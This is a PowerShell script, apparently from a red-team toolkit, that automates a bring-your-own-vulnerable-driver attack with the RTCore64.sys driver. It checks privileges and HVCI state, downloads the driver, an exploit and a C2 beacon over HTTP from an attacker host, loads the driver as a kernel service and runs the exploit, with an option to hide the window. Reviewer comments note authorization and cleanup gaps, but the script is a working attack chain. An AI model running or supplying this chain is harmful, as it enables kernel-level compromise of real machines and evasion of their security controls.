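# Prepare-RTCore64.ps1
# Automates: download driver + beacon + exploit -> load driver -> run exploit
# Requires: SeLoadDriverPrivilege + HVCI disabled
# NOTE(review): this stages and loads a known-vulnerable signed driver (BYOVD).
# Run it only on hosts in scope of an authorized engagement. Nothing in this
# script unloads the driver or deletes its service afterwards, so the vulnerable
# driver stays resident until cleanup is done by hand.
Write-Host "[*] Start RTCore64.sys BYOVD Attack By LazyOwn RedTeam" -ForegroundColor Cyan

# 1. Privilege check: SeLoadDriverPrivilege.
#    `whoami /priv` lists every privilege the token holds, including disabled
#    ones, so matching the privilege name alone (the original check) says nothing
#    about the State column. Absence is still fatal; a present-but-not-Enabled
#    state is reported so the "ENABLED" banner is no longer printed unconditionally.
Write-Host "[*] Checking Privs..." -ForegroundColor Yellow
$privs = whoami /priv 2>$null | Select-String "SeLoadDriverPrivilege"
if (-not $privs) {
    Write-Error "[-] SeLoadDriverPrivilege not enabled."
    exit 1
}
# The State column reads "Enabled"/"Disabled" on English Windows; on localized
# builds the word differs, so a non-match is a warning rather than a hard stop.
$privLine = ($privs | Select-Object -First 1).Line
if ($privLine -match '\bEnabled\b') {
    Write-Host "[+] SeLoadDriverPrivilege: ENABLED" -ForegroundColor Green
} else {
    Write-Warning "[!] SeLoadDriverPrivilege is present but not reported as Enabled: $privLine"
}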
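# 2. Verify that HVCI/VBS is disabled.
#    Win32_DeviceGuard reports VBS state in VirtualizationBasedSecurityStatus
#    (0 = off); HVCI specifically shows up as value 2 in SecurityServicesRunning.
#    When the query fails (class missing, WMI blocked) the original compared
#    $null -ne 0 and wrongly reported VBS as enabled — that case is now "unknown".
Write-Host "[*] Check state of Virtualization-Based Security (HVCI)..." -ForegroundColor Yellow
$deviceGuard = Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard -ErrorAction SilentlyContinue
if ($null -eq $deviceGuard) {
    Write-Warning "[!] Could not query Win32_DeviceGuard; VBS/HVCI state unknown."
} elseif ($deviceGuard.VirtualizationBasedSecurityStatus -ne 0) {
    # VBS is configured or running; distinguish whether HVCI itself is active,
    # since that is the service that rejects blocklisted drivers.
    $hvciRunning = @($deviceGuard.SecurityServicesRunning) -contains 2
    if ($hvciRunning) {
        Write-Warning "[!] VBS/HVCI is Enabled. The exploit could be fail."
    } else {
        Write-Warning "[!] VBS is enabled (HVCI not reported as running). The exploit could be fail."
    }
} else {
    Write-Host "[+] VBS/HVCI: OFF → ¡Found VULN!" -ForegroundColor Green
}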
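# 3. Paths and URLs.
#    Defaults are the original hard-coded values; both the staging directory and
#    the staging host can be overridden through the environment so the script
#    does not assume the Administrator profile or one fixed attacker IP.
#    Join-Path removes the dependency on the trailing backslash that the original
#    string concatenation relied on.
$Path = if ($env:RTCORE_STAGE_DIR) { $env:RTCORE_STAGE_DIR } else { "C:\Users\Administrator\Documents\" }
$ServerBase = if ($env:RTCORE_STAGE_URL) { $env:RTCORE_STAGE_URL.TrimEnd('/') } else { "http://10.10.14.91" }
$DriverLocalPath = Join-Path $Path "RTCore64.sys"
$ExploitLocalPath = Join-Path $Path "exploit.exe"
$BeaconLocalPath = Join-Path $Path "beacon.exe"
# NOTE(review): plain HTTP — the payloads are fetched without TLS, so anyone on
# the network path can substitute them; the download step only verifies the
# driver when an expected hash is supplied.
$DriverUrl = "$ServerBase/RTCore64.sys"
$ExploitUrl = "$ServerBase/exploit.exe"
$BeaconUrl = "$ServerBase/beacon.exe"
$ServiceName = "RTCore64"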
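# 4. Download the driver if it is not already staged.
#    Create the staging directory first: Invoke-WebRequest -OutFile fails when the
#    parent directory is missing, which the original silently assumed existed.
if (-not (Test-Path $Path)) {
    New-Item -ItemType Directory -Path $Path -Force | Out-Null
}
if (-not (Test-Path $DriverLocalPath)) {
    Write-Host "[*] Driver not found downloading $DriverUrl..." -ForegroundColor Yellow
    try {
        Invoke-WebRequest -Uri $DriverUrl -OutFile $DriverLocalPath -UseBasicParsing
        Write-Host "[+] Driver downloaded in $DriverLocalPath" -ForegroundColor Green
    } catch {
        Write-Error "[!] Error donwload driver: $_"
        exit 1
    }
} else {
    Write-Host "[+] Driver exist in $DriverLocalPath" -ForegroundColor Green
}
# Optional integrity check. The driver arrives over plain HTTP and is loaded into
# the kernel, so pin its SHA-256 whenever the expected value is known. Opt-in via
# $env:RTCORE_DRIVER_SHA256 so the original unchecked flow still works unchanged.
if ($env:RTCORE_DRIVER_SHA256) {
    $actualHash = (Get-FileHash -Algorithm SHA256 -LiteralPath $DriverLocalPath).Hash
    if ($actualHash -ne $env:RTCORE_DRIVER_SHA256.ToUpperInvariant()) {
        Write-Error "[!] Driver hash mismatch: expected $($env:RTCORE_DRIVER_SHA256) got $actualHash"
        exit 1
    }
    Write-Host "[+] Driver SHA-256 verified" -ForegroundColor Green
}
# 5. Download the exploit (always re-fetched, unlike the driver; a failure is fatal).
Write-Host "[*] Download exploit from $ExploitUrl..." -ForegroundColor Yellow
try {
    Invoke-WebRequest -Uri $ExploitUrl -OutFile $ExploitLocalPath -UseBasicParsing
    Write-Host "[+] Exploit donwloaded in $ExploitLocalPath" -ForegroundColor Green
} catch {
    Write-Error "[!] Error downloading exploit: $_"
    exit 1
}
# 6. Download the beacon. A failure here is deliberately non-fatal: the script
#    continues and runs the exploit without it.
Write-Host "[*] Downloading beacon from $BeaconUrl..." -ForegroundColor Yellow
try {
    Invoke-WebRequest -Uri $BeaconUrl -OutFile $BeaconLocalPath -UseBasicParsing
    Write-Host "[+] Beacon downloaded in $BeaconLocalPath" -ForegroundColor Green
} catch {
    Write-Warning "[!] Error downloading beacon: $_ (continuando sin él)"
}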
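# 7. Detect and remove a leftover service with the same name.
#    Get-Service only enumerates Win32 services (ServiceController.GetServices),
#    not kernel-driver services, so the original check could never see a stale
#    RTCore64 driver service and `sc create` would then fail with "already exists".
#    `sc query` returns 0 when the service exists and 1060 when it does not.
sc.exe query $ServiceName 2>&1 | Out-Null
$existingService = ($LASTEXITCODE -eq 0)
if ($existingService) {
    Write-Host "[*] Service $ServiceName exist, stoping and deleting..." -ForegroundColor Yellow
    # Driver services may not honour a user-mode stop request; if the driver is
    # still running, `sc delete` only marks it for deletion and the create below
    # fails with error 1072. Surface the delete result instead of discarding it.
    Stop-Service $ServiceName -Force -ErrorAction SilentlyContinue
    $deleteResult = sc.exe delete $ServiceName 2>&1
    if ($LASTEXITCODE -ne 0) {
        Write-Warning "[!] sc delete $ServiceName returned $LASTEXITCODE : $deleteResult"
    }
    Start-Sleep -Seconds 2
}
# 8. Create the driver service. sc.exe requires the space after each "key=";
#    PowerShell passes $DriverLocalPath as a single argument (quoted if it has spaces).
Write-Host "[*] Witchcrafting malicious service driver..." -ForegroundColor Yellow
$result = sc.exe create $ServiceName binPath= $DriverLocalPath type= kernel start= demand 2>&1
if ($LASTEXITCODE -ne 0) {
    Write-Error "[!] Error witchcrafting servicio: $result"
    exit 1
}
Write-Host "[+] Service $ServiceName created successfully" -ForegroundColor Green
# 9. Start the service — this is the step that maps the driver into the kernel.
#    A failure here is commonly a code-integrity / driver-blocklist rejection
#    (presumably what the HVCI check above is meant to predict); the exact
#    Win32 error is in $result.
Write-Host "[*] Starting service $ServiceName..." -ForegroundColor Yellow
$result = sc.exe start $ServiceName 2>&1
if ($LASTEXITCODE -ne 0) {
    Write-Error "[!] Error starting the service: $result"
    exit 1
}
Write-Host "[+] Service $ServiceName started successfully" -ForegroundColor Green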
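# 10. Run the exploit (labelled "11" in the original; there is no step 10).
Write-Host "[*] Exploiting..." -ForegroundColor Magenta
# Option 1: visible console (recommended for testing). The original discarded
# the exit code, so a failed exploit and a successful one looked identical.
& $ExploitLocalPath
$exploitExit = $LASTEXITCODE
if ($exploitExit -ne 0) {
    Write-Warning "[!] exploit.exe exited with code $exploitExit"
}
# Option 2: hidden window (recommended for deploy)
#Start-Process -FilePath $ExploitLocalPath -WindowStyle Hidden -Wait
# NOTE(review): nothing in this script stops or deletes the $ServiceName service
# or removes the staged .sys/.exe files — the vulnerable driver remains loaded on
# the target after the script exits. Add that to the engagement cleanup.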